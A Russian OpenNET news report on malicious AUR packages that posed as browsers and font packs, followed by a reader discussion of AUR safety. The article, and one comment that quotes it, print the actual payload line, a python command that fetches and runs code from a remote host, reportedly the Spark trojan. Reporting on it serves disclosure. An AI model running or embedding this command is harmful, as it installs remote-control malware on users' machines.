The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

01.08.2025 21:56

В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда 'python -c "$(curl https://segs.lol/9wUb1Z)"', загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет google-chrome-stable был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления google-chrome-stable в AUR были загружены два вредоносных пакета - "chrome" и "chrome-bin", содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

  1. Главная ссылка к новости (https://www.reddit.com/r/archl...)
  2. OpenNews: В AUR-репозитории Arch Linux выявлены вредоносные пакеты
  3. OpenNews: Релиз Aura 4.0.0, пакетного менеджера для Arch Linux
  4. OpenNews: Выпуск пакетного менеджера pacstall 5.0, развивающего аналог AUR для Ubuntu
  5. OpenNews: Эксперимент по получению контроля над пакетами в репозитории AUR
  6. OpenNews: В AUR-репозитории Arch Linux найдено вредоносное ПО
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63662-arch
Ключевые слова: arch, aur, malware
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (121) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 22:35, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    > python -c "$(curl https://segs.lol/9wUb1Z)"

    LOL!

     
  • 1.2, Аноним (2), 22:36, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +14 +/
    В AUR-репозитории выявлен безвредный пакет.
     
     
  • 2.57, Аноним (57), 08:51, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Aur, сами делают вирус.
    Чтобы выпускать багфиксы.
    Или что то вроде антиаирусов.
     
     
  • 3.113, Аноним (113), 14:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Кек, давно таких шизов не видел. Хоть ты и потешный, но всё-таки выпей таблетки.
     
     
  • 4.144, кантикариус (?), 20:22, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Кек, давно таких шизов не видел.

    Просто читай местные комментарии чаще.

     
  • 3.143, кантикариус (?), 20:21, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что-то вроде антиквариусов. Это как архивариусы, только без амфореусов.
     

  • 1.3, Аноним (3), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
     
     
  • 2.5, Аноним (5), 22:52, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    виноват в первую очередь сам пользователь

    Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

    Ведь всю помойку тянут на ПК.. всю!

     
  • 2.48, Anonimm (?), 08:08, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
     
     
  • 3.88, Аноним (88), 12:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Надо ставить DrWeb
     
     
  • 4.100, Anonimm (?), 12:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
     
     
  • 5.130, Аноним (-), 16:18, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
     
     
  • 6.145, кантикариус (?), 20:26, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
     
  • 3.106, Аноним (106), 12:59, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это - другое! ))
     
  • 3.146, кантикариус (?), 20:26, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Особый вид местной гениальности, да.
     

  • 1.4, Аноним (5), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Так можно туннели бекдором до SSH кидать и компом чужим управлять..

     
     
  • 2.75, Аноним (75), 10:31, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
     
     
  • 3.101, Anonimm (?), 12:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?
    Да уж, уровень экспертности зашкаливает.. 😆
     
     
  • 4.107, olelukoie (ok), 13:20, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    М-да? А если еще раз подумать? В нормальных дистрибутивах (open)ssh-client(s) и (open)ssh-server - это разные пакеты и если надо подключаться к удаленному хосту по ssh, а свой сервер поднимать не требуется, то ставится только пакет 'client'.

    > На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.

    Если есть статический IP, то ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит). Так что наличие ssh на домашнем компе не такая уж ненужная вещь. А про рабочий комп в "офисе", если он переведен на "отечественную" ОС или любой другой Linux, то ssh - один из очень немногих способов админам управлять рабочими местами сотрудников, так что ssh-сервер тоже весьма вероятно будет нужен.

     
     
  • 5.118, Аноним (75), 14:49, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит)

    Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.

     
  • 4.116, Аноним (75), 14:48, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

    Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.

     

  • 1.6, Аноним (6), 22:58, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    И что теперь делать?
     
     
  • 2.7, Аноним (7), 23:10, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +13 +/
    Читать пкгбилды аура перед запуском.

    Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

     
     
  • 3.49, Anonimm (?), 08:11, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Читать пкгбилды

    Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..

     
     
  • 4.64, Аноним (64), 09:25, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Для быта Линукс даже не мёртв, а не зачат.
     
  • 4.78, Аноним (75), 10:40, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
     
     
  • 5.147, кантикариус (?), 20:30, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
     
  • 4.89, Пояснительная бригада (?), 12:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
     
     
  • 5.102, Anonimm (?), 12:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А вот и разделение на сорта подъехало..
     
     
  • 6.114, Пояснительная бригада (?), 14:41, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
     
  • 5.148, кантикариус (?), 20:37, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
     
  • 4.90, Аноним (88), 12:06, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Установить антивирус.
    Во всех нормальных магазинах приложений для Андроид есть встроенный.
     
     
  • 5.103, Anonimm (?), 12:54, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Какая взаимосвязь между pkgbuild и Android?
     
  • 2.16, НяшМяш (ok), 00:12, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
     
  • 2.26, Аноним (113), 02:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
     
  • 2.28, Bottle (?), 02:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
     
     
  • 3.50, Anonimm (?), 08:12, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Интересно, а для андроида и айфона они тоже исходники читают?
    Вспомнил - ведь "это другое".. 😆
     
     
  • 4.59, dannyD (?), 08:58, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    сходи на f-droid почитай.
     
  • 3.91, Пояснительная бригада (?), 12:06, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
     
     
  • 4.104, Anonimm (?), 12:56, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > не понимают разницы между виндой и дистрибутивами Линукс.

    Как выяснилось - никакой..

     

  • 1.8, zionist (ok), 23:13, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –17 +/
    Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования.
     
     
  • 2.9, Аноним (9), 23:18, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    В аур пакеты проверяются сообществом и исходники открыты, что снижает риски. А вот что творится в сторонних пользовательских репозиториях других систем, например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно. Разница лишь в прозрачности
     
     
  • 3.13, Аноним (13), 23:34, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • –6 +/
    >снижает риски

    Снижають, снижають, милок, не боись! Новость читал?

     
     
  • 4.15, Аноним (9), 00:05, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +6 +/
    снижают, но не исключают. бабуль, ложись спать
     
  • 3.29, Ubuntoid (?), 04:44, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Врать нехорошо!

    Можно спокойно посмотреть исходник конкретного пакета из PPA. То что ты не знаешь как посмотреть нужную информацию и при этом что-то пишешь - это уже клиника.

     
     
  • 4.34, 12yoexpert (ok), 05:40, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    1) ты копируешь команду с лаунчпада и запускаешь у себя, кому ты тут пытаешься мозги пудрить?
    2) ты качаешь бинари с лаунчпада, какая вообще разница, что там в рецептах сборки?
     
     
  • 5.84, Аноним (84), 11:51, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • –1 +/
     
  • 4.76, Аноним (76), 10:31, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    понадобилось как-то пересобрать пакет из сторонних реп, так там даже их патчи не наложились, потому что были от другой версии.
    Посмотреть исходник могу, а собрать не могу. А они могут, но явно не с теми патчами, что распространяют
     
  • 3.51, Anonimm (?), 08:15, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > исходники открыты

    То есть простой пользователь (а линь ведь так и рекламируют) должен быть ещё и программистом? Неудивительно, что у вас 4% фанатов..

     
     
  • 4.122, Аноним (113), 15:08, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Чтобы посмотреть в PKGBUILD куда ведут ссылки на исходники/бинари, не нужно быть программистом. Достаточно не быть идиотом.
     
     
  • 5.123, zionist (ok), 15:17, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Чтобы посмотреть в PKGBUILD куда ведут ссылки на исходники/бинари, не нужно быть
    > программистом. Достаточно не быть идиотом.

    Вот идиоты и составляют большинство Arch комьюнити.

     
     
  • 6.125, Аноним (113), 15:20, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Подкрепил бы свой наброс статистикой что ли. Ах, да ты же его из своих влажных фантазий выудил.
     
     
  • 7.127, zionist (ok), 15:22, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Подкрепил бы свой наброс статистикой что ли. Ах, да ты же его
    > из своих влажных фантазий выудил.

    Мне было достаточно опыта личного общения с их токсичным сообществом.

     
  • 3.79, Аноним (75), 10:43, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно

    Конечно, может, и не остается за кадром, а выпячивается. Deadbeef, например. Более того, он в некоторых дистрибутивах ставился по умолчанию, и этот мусор вместе с его репами и другим мусором приходилось вычищать после установки.

     
  • 2.11, Аноним (11), 23:31, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Аур это такой же арч, как ppa дебиан.
     
     
  • 3.17, НяшМяш (ok), 00:13, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Аур лучше, исходники прямо в вебморде можно посмотреть. Как там у ппа с отображением рецепта сборки?
     
     
  • 4.80, Аноним (75), 10:48, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вы знаете, ppa все-таки лучше snap. Недавно попробовал поставить Nextcoud при установке сервера Ubuntu. Поковырявшись час с настройками (настройки SQL, память для PHP, файловое хранилище на нестандартных пользовательских ресурсах), снес его вместе со snap, и без проблем установил с сайта разработчика.
     
  • 3.27, penetrator (?), 02:40, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    а в арче без AUR можно жить?

    кстати что там с Packman ему можно доверять?

     
     
  • 4.54, Аноним (54), 08:43, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >а в арче без AUR можно жить?

    Можно, иногда надо будет дружить с git.

    >кстати что там с Packman ему можно доверять?

    Что еще за Packman? Нет в Арче никакого Packman.

     
     
  • 5.83, penetrator (?), 11:34, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    конечно нету это SUSE

    второй вопрос про репу а не про арч

     
  • 4.66, Аноним (64), 09:28, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Он точки поедает.
     
  • 4.68, Аноним (68), 09:39, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >а в арче без AUR можно жить?

    А зачем вообще эта помойка нужна? Поставить какую-то хипстоту? У меня вот только оф.репы, хватает всего с головой. Что не так?

     
     
  • 5.129, Аноним (54), 16:03, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >А зачем вообще эта помойка нужна? Поставить какую-то хипстоту? У меня вот только оф.репы, хватает всего с головой. Что не так?

    В AUR есть всякие специфические драйвера, которые ставятся оттуда без особого гугления. В AUR есть софт, отсутствующий в офрепах, например plex-media-server, или тот же firefox-esr.

    Ну и по теме, то что обнаружили заразу через несколько часов - играет только в плюс. Есть продукты, где такое сидит годами.

     
  • 4.109, Аноним (109), 14:14, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >кстати что там с Packman ему можно доверять?

    Прецедентов не было.
    Но англоязычное сообщество в ТГ не рекомендует.
    Там за flatpak топят.

     
  • 4.117, ProfessorNavigator (ok), 14:48, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > а в арче без AUR можно жить?

    Да, без проблем. Или самому PKGBUILDы писать, или просто из исходников ставить. Можно и без этого обойтись - в официальных репозиториях в принципе есть много чего.

     
  • 2.31, 12yoexpert (ok), 05:15, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > zionist всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования

    поправил

     
     
  • 3.124, zionist (ok), 15:19, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >> zionist всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования
    > поправил

    Используют холопов, вроде тебя. Поэтому не проецируй своё холопское на нормальных людей.

     
     
  • 4.131, 12yoexpert (ok), 17:13, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    рабам слова не давали, иди работай
     
     
  • 5.132, zionist (ok), 18:07, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > рабам слова не давали, иди работай

    Ты холоп, ты и иди работать.

     
  • 2.71, Аноним (71), 10:15, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Valve использует Arch - УЖЕ на нём зарабатывают деньги! KDE к нему присматриваются.
     
     
  • 3.98, Аноним (57), 12:37, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Valve использует Arch - УЖЕ на нём зарабатывают деньги! KDE к нему присматриваются.

    1xBet

     
  • 2.92, Пояснительная бригада (?), 12:09, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 3.126, zionist (ok), 15:20, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     

  • 1.10, freeperson (?), 23:30, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –5 +/
    Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
     
     
  • 2.14, Аноним (14), 00:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Гентушникам тоже ухо держать востро в отношении к оверлеям.
     
     
  • 3.32, 12yoexpert (ok), 05:29, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    разумеется, но:
    1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится
    2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
     
     
  • 4.58, dannyD (?), 08:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >>гентушников тупо меньше

    это с какого пальца?

    может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.

     
     
  • 5.72, 12yoexpert (ok), 10:25, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без

    мне пришлось вырезать половину месы, чтобы кура запустилась

     
     
  • 6.85, dannyD (?), 11:54, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >>да тупо судя по количеству попсовых пакетов.

    ошибка статистической выборки.

    ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.

     
  • 6.140, Аноним (140), 19:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
     
  • 2.24, Аноним (113), 02:16, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > AUR это та ещё помойка, где никто не проверяет ничего.
    > Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

    Держи в курсе.

    > ставьте Слаку или Gentoo, и будет вам счастье.

    Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

     
  • 2.33, 12yoexpert (ok), 05:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    поддерживаю как гентушник, лет 7 сидевший на арче
     
  • 2.141, Аноним (141), 19:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

    Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов.
    Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.

     

  • 1.20, Аноним (20), 01:02, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
     
  • 1.38, Аноним (38), 06:07, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Чем это отличается от npm?
     
  • 1.41, Анониматор (?), 07:10, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина".
    Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
     
     
  • 2.46, ЖИРОПЕРДЯСТИК (?), 07:55, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –4 +/
    > считают что AUR это часть Арча

    Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки.

    А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.

     
     
  • 3.47, Аноним (47), 08:05, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
     

  • 1.42, ЖИРОПЕРДЯСТИК (?), 07:10, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
     
     
  • 2.52, Аноним (47), 08:16, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
     
     
  • 3.77, Аноним (77), 10:38, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
     
  • 3.82, ЖИРОПЕРДЯСТИК (?), 10:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Таких васянов там сразу отлавливают

    Главное верить. Тысячегласс смотрят!

     
     
  • 4.99, Аноним (57), 12:38, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Тысячегласс смотрят!

    https://skillbox.ru/upload/setka_images/11561419052025_441973ee770ac6d21790371

     
  • 2.94, Пояснительная бригада (?), 12:14, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
     
     
  • 3.135, Аноним (38), 18:35, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
     

  • 1.45, Аноним (45), 07:44, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu?
    Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена!
    Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
     
     
  • 2.53, Anonimm (?), 08:18, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > изучать каждый PKGBUILD

    А потом удивляться, что вас всего 4%..

     
     
  • 3.81, Аноним (75), 10:51, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > вас всего 4%

    Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.

     
  • 3.121, Пояснительная бригада (?), 15:01, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Тебе надо 146%?
     
  • 3.134, Аноним (141), 18:27, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > А потом удивляться, что вас всего 4%..

    Умных людей во все времена было мало

     
     
  • 4.137, Аноним (38), 18:36, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Наличие ума и линукса на десктопе имеет обратную корреляцию.
     
     
  • 5.139, Аноним (141), 19:15, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Цитаты вяликих людей?
     

  • 1.63, Аноним (63), 09:13, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
     
     
  • 2.87, Аноним (87), 11:58, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > А в aur то не бинари

    Говоришь так, будто бы их там нет...

     
     
  • 3.119, Аноним (113), 14:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
     

  • 1.67, Аноним (67), 09:37, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Достаточно не ставить свежие пакеты из аур.
     
     
  • 2.73, 12yoexpert (ok), 10:26, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    это арч, там в принципе нет несвежих пакетов
     

  • 1.86, Аноним (86), 11:57, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!
    А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI.
    Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
     
     
  • 2.95, Пояснительная бригада (?), 12:17, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
     
     
  • 3.142, Аноним (140), 19:55, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
     

  • 1.93, Аноним (93), 12:13, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
     
     
  • 2.96, Пояснительная бригада (?), 12:23, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Aур использую чтоб качать 1 пакет, zapret.
     

  • 1.97, Аноним (97), 12:34, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Антивирус Линуксу не нужен!!

    ВСЁ БЕЗОПАСНО!

    РАСХОДИМСЯ!

     
     
  • 2.108, Сообщение (?), 13:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Кто так говорит, подразумевает, что пакеты будут ставиться из оф репов, а не из пользовательских файлопомоек
     
  • 2.110, 12yoexpert (ok), 14:20, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    иди погугли, чем троян отличается от вируса
     
     
  • 3.112, anonymous (??), 14:31, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • –2 +/
     
     
  • 4.120, Аноним (113), 14:59, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • +2 +/
     
     
  • 5.128, anonymous (??), 15:38, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     

